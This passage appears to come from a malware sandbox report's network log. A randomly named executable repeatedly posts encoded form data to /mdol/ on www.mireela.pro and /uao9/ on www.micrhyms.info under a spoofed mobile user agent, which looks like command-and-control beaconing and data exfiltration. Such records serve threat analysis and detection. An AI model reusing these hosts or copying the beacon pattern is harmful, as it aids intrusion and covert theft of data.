                                                                                            Data Raw: 70 5a 78 74 75 78 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 76 73 34 37 34 49 7a 7a 43 6c 79 44 39 71 73 35 70 42 31 33 58 4c 4c 34 4f 78 45 6c 32 56 2f 36 77 71 36 6f 6e 38 6f 52 34 2f 32 7a 76 78 65 42 51 2f 47 58 43 6e 30 75 33 4d 4e 50 31 6f 50 65 4a 64 56 33 59 62 62 76 32 78 31 78 4e 48 2f 50 6c 35 52 6e 32 34 32 68 35 52 2b 34 66 50 4e 76 39 66 75 71 7a 6b 69 44 55 31 6e 45 4c 56 56 34 55 49 6e 66 67 55 33 4f 54 34 68 79 32 4a 5a 39 47 4d 35 76 55 6d 77 72 79 41 59 79 54 34 55 6c 79 61 6d 6e 50 48 77 59 67 53 72 6c 79 71 50 64 62 64 6f 4d 56 4f 72 65 52 6d 73 54 75 66 4a 74 2f 67 4e 71 73 79 54 44 72 6b 59 3d
                                                                                            Data Ascii: pZxtux=FD5fONH9UoGPvs474IzzClyD9qs5pB13XLL4OxEl2V/6wq6on8oR4/2zvxeBQ/GXCn0u3MNP1oPeJdV3Ybbv2x1xNH/Pl5Rn242h5R+4fPNv9fuqzkiDU1nELVV4UInfgU3OT4hy2JZ9GM5vUmwryAYyT4UlyamnPHwYgSrlyqPdbdoMVOreRmsTufJt/gNqsyTDrkY=
                                                                                            Oct 24, 2024 15:30:11.752505064 CEST959INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:11 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.54998969.57.163.227803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:13.620799065 CEST693OUTPOST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 67 76 67 37 36 70 7a 7a 4f 56 79 63 68 61 73 35 67 68 30 2b 58 4c 48 34 4f 30 38 50 32 6e 62 36 77 4c 4b 6f 6d 35 49 52 2f 2f 32 7a 37 68 65 4f 66 66 47 4d 43 6e 34 49 33 4a 4e 50 31 72 7a 65 4a 63 6c 33 62 73 48 73 31 42 31 6b 4d 33 2f 4a 72 5a 52 6e 32 34 32 68 35 56 76 6c 66 50 56 76 36 73 6d 71 38 6c 69 41 64 56 6e 4c 64 46 56 34 51 49 6e 62 67 55 33 67 54 39 4a 4d 32 4c 68 39 47 4a 56 76 55 79 6b 6f 34 41 59 4f 4e 49 56 63 37 59 44 52 4a 30 34 6e 72 43 71 52 70 6f 2f 54 61 72 5a 6d 50 73 6a 32 43 47 41 72 2b 4d 42 61 75 51 73 44 32 52 44 7a 31 7a 4f 42 49 54 76 64 70 65 48 49 76 68 34 69 59 75 54 65 74 2b 43 55
                                                                                            Data Ascii: pZxtux=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nb6wLKom5IR//2z7heOffGMCn4I3JNP1rzeJcl3bsHs1B1kM3/JrZRn242h5VvlfPVv6smq8liAdVnLdFV4QInbgU3gT9JM2Lh9GJVvUyko4AYONIVc7YDRJ04nrCqRpo/TarZmPsj2CGAr+MBauQsD2RDz1zOBITvdpeHIvh4iYuTet+CU
                                                                                            Oct 24, 2024 15:30:14.308830023 CEST959INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:14 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.54999069.57.163.227803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:16.168088913 CEST1710OUTPOST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 67 76 67 37 36 70 7a 7a 4f 56 79 63 68 61 73 35 67 68 30 2b 58 4c 48 34 4f 30 38 50 32 6e 54 36 77 35 43 6f 70 34 49 52 2b 2f 32 7a 34 68 65 61 66 66 47 4e 43 6b 49 45 33 4a 49 74 31 75 33 65 54 2b 74 33 50 4e 48 73 75 78 31 6b 4a 48 2f 4d 6c 35 51 6e 32 34 6d 6c 35 52 7a 6c 66 50 56 76 36 71 43 71 31 55 69 41 52 31 6e 45 4c 56 56 30 55 49 6e 6a 67 56 65 64 54 39 4e 63 33 2f 56 39 46 70 46 76 62 68 4d 6f 2b 51 59 4d 4d 49 56 74 37 59 2f 43 4a 30 56 57 72 42 32 2f 70 71 66 54 58 38 73 35 59 75 7a 39 5a 48 6b 33 36 39 68 38 73 58 39 76 7a 54 57 42 35 7a 36 41 43 78 48 33 6f 34 4c 53 6b 77 31 4f 62 72 54 73 6c 72 7a 33 48 38 56 73 6d 6a 6f 6e 65 4d 6c 2f 65 41 4d 75 73 72 69 57 58 30 64 63 2b 39 51 39 59 58 4c 4e 71 61 6b 2b 58 44 2b 62 54 6f 45 4e 57 50 44 4c 70 77 74 61 52 39 76 5a 4d 62 39 4a 4d 4d 75 72 41 45 5a 4e 51 78 2b 56 59 7a 48 6f 38 45 2b 57 4e 56 78 37 49 4d 49 52 72 68 61 41 6f 33 33 4a 79 2f 49 38 76 77 46 4d 44 49 50 69 51 69 30 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nT6w5Cop4IR+/2z4heaffGNCkIE3JIt1u3eT+t3PNHsux1kJH/Ml5Qn24ml5RzlfPVv6qCq1UiAR1nELVV0UInjgVedT9Nc3/V9FpFvbhMo+QYMMIVt7Y/CJ0VWrB2/pqfTX8s5Yuz9ZHk369h8sX9vzTWB5z6ACxH3o4LSkw1ObrTslrz3H8VsmjoneMl/eAMusriWX0dc+9Q9YXLNqak+XD+bToENWPDLpwtaR9vZMb9JMMurAEZNQx+VYzHo8E+WNVx7IMIRrhaAo33Jy/I8vwFMDIPiQi0KpA2nvWnncYTE1OdNX7uQUfXxX9F7WLR3WcaAwW8s/8ijO+qdet7LDuBG3JuUfYO5fY49pSkgYiNR/LsHIaX0Sq/9+2Nvl4j8CnUqp34x21PI+oiHOmSu4XyHzBWBlEvAwKRDWcviq1G0IY6iONRNM4dv06whXuP5EPOKle1lxKE8l5hRgRmnUOZEcs3cQJX+ApJEgL0ofmPtNalHDv2T/DVLjzyiVwh/rIIIlinqozuLnDvjxqO80Oo8QY4MdEHHxenDAx25nVj2abRK7kAdWCOIapc8lizk0cJdoKYerDNe/ZXzLu/VtS0xGZXFuqpM60HufnMbVhIjXbTOHRgT+goz5TbUaD4R+LLTYj5l9xOKTyBv92QwUEMa9+lqm8uXvdJ0mqF+TurinTJx0/yuiNzsnY/z+gnBZIHTEi2XiLjb8kQpsP51e6uZoFGqv3jXdkGKBY7xC4UUzFOYgPRErAOAhoGa1GoF6IxFctsDrnrMVY075pe/ln4XoN2ienPN67oaVr5XVJAWWAmeihnPoN9MjEFgj1t9AtY4MpecAPb66Ev4tMrledcYX9AYPMuB1SzG8qwZIcBzuUeIK6OrABlyfoMDKmQGA0boKTCZjYqeamgowPYlBCTYHHObPQrmZxL3dpyTX6IPHx01AyMlaAP+vMcN4b9MM [TRUNCATED]
                                                                                            Oct 24, 2024 15:30:16.846338987 CEST959INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:16 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.54999169.57.163.227803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:18.710788965 CEST412OUTGET /mdol/?pZxtux=IBR/N437Xoj/lvQ/yaypF1iCxq0JhxtvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLlBdqXD3XopUqxrOy0G+yXtR7yOmR4k+PDTzACkBBVYCXxA==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:19.376859903 CEST974INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:19 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 815
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.5499923.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:24.489821911 CEST679OUTPOST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 64 70 4e 70 53 45 63 33 6e 67 2f 67 76 6b 45 46 79 41 64 6b 6a 4c 79 47 30 6e 78 41 77 6b 73 37 39 74 52 61 6d 68 43 6a 4a 42 73 67 74 4d 33 6c 52 7a 2b 44 43 69 47 47 50 49 59 7a 57 53 5a 55 35 5a 61 49 65 32 50 57 72 70 74 30 54 66 38 62 37 6b 5a 41 54 2b 6b 51 79 6d 35 65 4d 44 4e 53 49 4c 33 42 6a 44 52 63 63 64 56 39 78 55 47 6e 42 74 36 30 49 4b 59 38 4f 52 4b 4e 41 4a 2b 65 6d 51 30 52 42 34 36 49 6a 43 38 31 34 63 4c 4d 6b 49 42 72 33 53 6e 42 54 45 41 55 45 6b 39 77 49 33 6b 72 73 49 57 78 30 56 76 30 4a 2f 36 46 69 51 37 6a 4d 46 62 2b 4f 34 3d
                                                                                            Data Ascii: pZxtux=tuk1l9qtrPIRddpNpSEc3ng/gvkEFyAdkjLyG0nxAwks79tRamhCjJBsgtM3lRz+DCiGGPIYzWSZU5ZaIe2PWrpt0Tf8b7kZAT+kQym5eMDNSIL3BjDRccdV9xUGnBt60IKY8ORKNAJ+emQ0RB46IjC814cLMkIBr3SnBTEAUEk9wI3krsIWx0Vv0J/6FiQ7jMFb+O4=


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.5499933.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:27.026582003 CEST699OUTPOST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 38 5a 4e 76 31 6f 63 78 48 67 38 75 50 6b 45 50 53 41 5a 6b 6a 48 79 47 77 65 32 41 43 77 73 36 63 64 52 62 6e 68 43 69 4a 42 73 72 4e 4d 32 34 68 7a 68 44 44 65 4f 47 4e 63 59 7a 57 47 5a 55 34 70 61 49 70 4b 4d 48 72 70 76 79 54 66 36 47 72 6b 5a 41 54 2b 6b 51 79 79 54 65 4d 62 4e 53 59 62 33 42 48 66 53 52 38 64 57 71 42 55 47 6a 42 74 2b 30 49 4b 36 38 4e 56 67 4e 47 46 2b 65 6b 34 30 52 51 34 31 44 6a 43 36 37 59 64 6b 45 6d 52 65 74 6b 53 38 45 67 74 6e 4a 79 38 4a 31 2b 47 4f 78 4f 41 2b 69 55 35 58 6b 61 33 4e 55 53 78 53 35 76 56 72 67 5a 76 75 50 44 34 54 55 44 35 6a 4b 37 36 48 5a 63 79 42 7a 75 30 39
                                                                                            Data Ascii: pZxtux=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACws6cdRbnhCiJBsrNM24hzhDDeOGNcYzWGZU4paIpKMHrpvyTf6GrkZAT+kQyyTeMbNSYb3BHfSR8dWqBUGjBt+0IK68NVgNGF+ek40RQ41DjC67YdkEmRetkS8EgtnJy8J1+GOxOA+iU5Xka3NUSxS5vVrgZvuPD4TUD5jK76HZcyBzu09


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.5499943.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:29.573106050 CEST1716OUTPOST /uao9/ HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.micrhyms.info
                                                                                            Referer: http://www.micrhyms.info/uao9/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 74 75 6b 31 6c 39 71 74 72 50 49 52 64 38 5a 4e 76 31 6f 63 78 48 67 38 75 50 6b 45 50 53 41 5a 6b 6a 48 79 47 77 65 32 41 43 49 73 36 71 42 52 61 41 31 43 68 4a 42 73 6f 4e 4d 7a 34 68 79 37 44 43 32 43 47 4e 41 6d 7a 56 2b 5a 58 65 39 61 4b 64 65 4d 65 37 70 76 77 54 66 37 62 37 6b 41 41 56 65 67 51 79 69 54 65 4d 62 4e 53 65 2f 33 48 54 44 53 54 38 64 56 39 78 55 6a 6e 42 73 68 30 49 43 41 38 4f 35 61 4d 32 6c 2b 65 45 49 30 63 43 67 31 66 7a 43 34 34 59 64 38 45 6d 74 37 74 6b 4f 34 45 67 6f 43 4a 31 51 4a 30 35 62 35 6b 4b 31 6e 77 6d 78 74 73 4b 54 49 47 31 52 4b 37 2b 64 6b 67 5a 33 38 48 69 38 61 55 47 56 5a 4a 59 66 2f 4f 72 69 62 68 4f 67 39 4a 50 45 6a 61 79 46 32 2f 38 38 31 52 61 38 79 72 32 56 48 57 66 48 43 49 33 4f 52 73 44 6c 69 72 74 42 51 4c 51 30 49 48 4c 37 30 58 43 58 74 43 33 6f 6d 32 38 62 39 49 42 58 70 46 6c 50 4c 34 6d 6e 69 71 52 4f 54 50 78 72 44 73 49 59 65 66 74 6f 69 57 51 32 6e 2f 38 69 53 38 42 58 62 53 6c 79 75 34 46 45 49 58 59 57 61 70 75 69 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=tuk1l9qtrPIRd8ZNv1ocxHg8uPkEPSAZkjHyGwe2ACIs6qBRaA1ChJBsoNMz4hy7DC2CGNAmzV+ZXe9aKdeMe7pvwTf7b7kAAVegQyiTeMbNSe/3HTDST8dV9xUjnBsh0ICA8O5aM2l+eEI0cCg1fzC44Yd8Emt7tkO4EgoCJ1QJ05b5kK1nwmxtsKTIG1RK7+dkgZ38Hi8aUGVZJYf/OribhOg9JPEjayF2/881Ra8yr2VHWfHCI3ORsDlirtBQLQ0IHL70XCXtC3om28b9IBXpFlPL4mniqROTPxrDsIYeftoiWQ2n/8iS8BXbSlyu4FEIXYWapui/63JnkAmQc7zZB/6sAZp5xL8KAO7EGmidzyOpJg2RhXE7fCJ0PsCwehvSc1tGgozXS/AgIM1QMiQJU4GoT1/Amu7AjFG6MmSNsNrNvINnG6UIcXXY6oX3POeUZ2y7SxPA8tXHxLQa1NWzMg0Vh8FPtJD9XY18zCFalvzVJKHqYqBop4ODsFH2MYpGrZo4LquwS7atbIVCDssp9bfD+C4hJnVW816kzTgHTz0oNDtNX+Z4wG5o6Kt+sO7NtyZ5RSUbm3Iq1QC3w5WdWAH2oaSu26l81zveKjGIN+NmDdMOfbMrRotJBMuJaJ/lY+ETtG9Zp7ChxvQu/7J28NlJE3KBf3lDws6sHUTW5tqvfr7IuCYbZmh24naUe0fLCZ7nqrJsykTwic8o/D+c7D7aY/W3YM5lTSaDG8rvhNiIBRqb8nbvWDW9TaKlprxWtpG3bCU0ujWuY0gHJag0p0YCbnwjUKO8KLt5XjR5E5nvnxljaDVN6WZePaFniB+60WxiGRYZ/sW2QkudgRW8XnTYet9daYkMPFnPcV3E0lwgEyKqmfoPKp1QV/IU/1qDPdBZSs1JXcJHxguDlK7twpaJshG097UaZBqIUp9X+iYkpZ/zztHjgUHSY/DC65Oj2wTulhf3EgFZaO/8nWPtvgIgzjudynNnZiWY1YEei [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.5499953.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:32.117247105 CEST414OUTGET /uao9/?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.micrhyms.info
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
